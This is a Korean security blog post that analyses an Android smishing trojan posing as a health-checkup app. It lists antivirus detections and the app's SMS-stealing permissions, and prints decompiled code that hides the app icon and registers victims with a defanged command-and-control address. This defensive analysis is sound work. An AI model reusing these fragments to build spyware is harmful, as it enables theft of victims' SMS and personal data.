꿈을꾸는 파랑새

반응형

오늘은 늘 언제나 검진모아 정상사이트로 속인 피싱 사이트를 운영을 하고 해당 악성앱을 통해서 피싱 사이트에 연결을 해서 개인정보를 획득 및 금전적인 피해를 주는 악성코드인 검진모아에 대해 알아보겠습니다. 해당 부분은 정상적인 검진모아 사이트 와 전혀 상관이 없다는 것을 미리 알려 드리면 악성코드인 검진모아를 분석을 하는 과정입니다.
일단 해당 먼저 문자로 단축주소가 오게 되고 내용은 다음과 같습니다.
[Web 발신]
[건강검진] 통지 내용을 확인하세요. 이런 식으로 사용자를 낚습니다. 접속되는 사이트는 http://45.131.177(.)114/(에러, 국가: 홍콩(Hong Kong))
일단 해당 앱을 다운로드를 하거나 실행을 하면 반을 할 것입니다.
2020-10-05 06:13:24(UTC)기 준 해당 앱을 탐지(진단)하는 보안 업체 즉 백신프로그램(백신앱)입니다.
Ad-Aware:Trojan.GenericKD.43980587
AegisLab:Trojan.AndroidOS.SmForw.C!c
Alibaba:TrojanSpy:Android/SmForw.f3c2a88f
Avast:Android:SMForw-KX [Trj]
Avast-Mobile:Android:Evo-gen [Trj]
AVG:Android:SMForw-KX [Trj]

검진모아 피싱사이트검진모아 피싱사이트

Avira (no cloud):ANDROID/SpyAgent.FHDG.Gen
Cynet:Malicious (score: 85)
DrWeb:Android.SmsSpy.818.origin
eScan:Trojan.GenericKD.43980587
ESET-NOD32:A Variant Of Android/SMForw.K
F-Secure:Trojan:Android/Smforw.N
FireEye:Trojan.GenericKD.43980587
Fortinet:Android/SMSForw.K!tr
GData:Trojan.GenericKD.43980587
Ikarus:Trojan.AndroidOS.SMForw
K7GW:Trojan ( 0048d6e11 )
Kaspersky:HEUR:Trojan-Spy.AndroidOS.SmForw.kh
MAX:Malware (ai Score=100)

MaxSecure:Android.fakeinst.a
McAfee:Artemis!D9EF67596DFC
McAfee-GW-Edition:Artemis!Trojan
Microsoft:Trojan:MSIL/Crysen!rfn
NANO-Antivirus:Trojan.Android.SmsSpy.dqzmgp
Qihoo-360:Trojan.Android.Gen
Symantec:Trojan.Gen.MBT
Symantec Mobile Insight:Spyware:MobileSpy
Trustlook:Android.PUA.DebugKey
ZoneAlarm by Check Point:HEUR:Trojan-Spy.AndroidOS.SmFo

검진모아 악성코드 권한(AndroidManifest.xml)검진모아 악성코드 권한(AndroidManifest.xml)

입니다. 혹시나 바이러스토탈에서는 실제 최신 업데이트가 누락이 될 수가 있을 것 같아서 일단 V3 Light(V3 라이트) 기준 업데이트 정의(2020.10.05.08) 버전으로 수동으로 검사를 진행해도 탐지가 안 되었고 AnLab V3 파일 분석 보고서에서도 미확정 등급을 받고 있었으며 일단 해당 보고서는 파일 분석 보고서는 PC 검사에서 발견한 파일이나 클라우드 서버에 자동 분석 요청을 의뢰한 파일에 대한 정보를 제공합니다. 파일 분석 보고서를 활용하면, 진단된 파일에 대한 기본 정보와 클라우드 평판 정보를 참고할 수 있는 기능입니다. 일단은 탐지를 안 되고 있었습니다.

개인적으로 해외 백신앱을 유료로 결제하고 사용을 하시는 것도 추천합니다. 개인적으로는 ESET 제품을 사용을 하고 있습니다.다만, 이것은 개인적인 생각이고 V3 제품도 좋은 제품입니다. 아직 샘플이 수집이 되지 않아서 그런 것이기 때문에 개인적으로 해당 샘플은 AhnReport를 통해서 전송했습니다.
악성코드 권한은 다음과 같습니다.
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
입니다.

[소프트웨어 팁/보안] - 안철수 연구소에 악성코드 신고메일 보내는 방법입니다.

[소프트웨어 팁/보안] - 안랩 V3에 악성코드 의심 파일 신고 방법

com.stain.seed.MainActivitycom.stain.seed.MainActivity

쉽게 이야기하면 악성코드가 스마트폰에서 획득하는 권한은 다음과 같습니다.
android.permission.INTERNET",
READ_PHONE_STATE
READ_SMS
RECEIVE_BOOT_COMPLETED
RECEIVE_SMS
SEND_SMS
WRITE_SETTINGS
입니다.

검진 모아-com.stain.seed.HttpUtils검진 모아-com.stain.seed.HttpUtils

그리고 com.stain.seed.MainActivity 내용은 다음과 같습니다.
public class MainActivity extends Activity {
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    SharedPreferences sharedPreferences = getSharedPreferences("pref", 0);
    SharedPreferences.Editor editor = sharedPreferences.edit();
    editor.putInt("ID", 0);
    editor.putBoolean("Magic", false);
    if (sharedPreferences.getString("Server_URL", "") == "")
      editor.putString("Server_URL", HttpUtils.URL);
    editor.commit();
    (new Tools((Context)this)).regCustomer();
    startService(new Intent((Context)this, RelService.class));
    finish();
  }
}

IDA HttpUtils.classIDA HttpUtils.class

여기서 HttpUtils.URL를 통해서 com.stain.seed.HttpUtils 가면 다음과 같은 명령어가 볼 수 있습니다.
안랩 V3 분석 보고서안랩 V3 분석 보고서

public class HttpUtils {
  public static String URL = "http://45.128.145(.)33:8899/";
 
  private static DefaultHttpClient buileClient() {
    BasicHttpParams basicHttpParams = new BasicHttpParams();
    HttpConnectionParams.setConnectionTimeout((HttpParams)basicHttpParams, 20000);
    HttpConnectionParams.setSoTimeout((HttpParams)basicHttpParams, 7200000);
    return new DefaultHttpClient((HttpParams)basicHttpParams);
  }

그리고 여기서 45.128.145(.)33(에러)를 조회를 해보면 다음과 같은 결과를 얻을수가 있습니다.
IP Address:45.128.145(.)33
Reverse DNS:** server can't find 33.145.128(.)45.in-addr.arpa: SERVFAIL
Hostname:45.128.145(.)33
Location For an IP:45.128.145(.)33
Continent:Asia (AS)

V3 악성코드 신고V3 악성코드 신고

Country:Hong Kong   
IP Location Find In Hong Kong(HK)
Capital:Hong Kong
홍콩으로 돼 있는 것을 확인할 수가 있습니다.

악성코드 IP 주소악성코드 IP 주소

늘 강조하지만, 안드로이드 정식 스토어 이외에는 절대로 앱을 설치를 하는 것은 하지 말아야 합니다. 이유는 당연히 악성코드가 설치될 확률이 높으며 그리고 기본적으로 정식 스토어 이외에 APK 파일을 설치하면 안드로이드 스마트폰에서 제발 좀 해당 앱 설치를 하면 악성코드에 감염될 수가 있다는 경고를 볼 수가 있습니다. 만약 설치를 하면 내 스마트폰이지만 이미 내 스마트폰이 되지 않는 경우가 발생합니다. 항상 기본적인 보안 수칙을 지키는 것이 가장 안전합니다.

728x90
반응형

이 글을 공유합시다

facebook twitter googleplus kakaostory naver

본문과 관련 있는 내용으로 댓글을 남겨주시면 감사하겠습니다.

비밀글모드

  1. Favicon of https://jongamk.tistory.com 핑구야 날자 2020.10.06 06:55 신고

    건강 검진을 사칭하는 악성코드 라니 놀랍네요

  2. Favicon of https://xuronghao.tistory.com 空空(공공) 2020.10.06 11:10 신고

    별별 악성 코드가 다 있군요

  3. Favicon of https://jjingift.tistory.com 찐기프트 2020.10.06 11:53 신고

    안녕하세요^^
    포스팅 잘보고, 공감 및 구독하고 가요~
    날씨가 꽤 쌀쌀하네요...
    환절기 감기 조심 하시구요!
    오늘도 즐겁고 행복한 하루 보내세요^^

  4. Favicon of https://smokeham.tistory.com 연기햄 2020.10.06 13:33 신고

    참... 문제네요!
    좋은 포스팅 잘 보구 공감 누르고 갑니당~♥

  5. Favicon of https://prolite.tistory.com IT세레스 2020.10.06 23:14 신고

    와 진짜 조심해야겠습니다.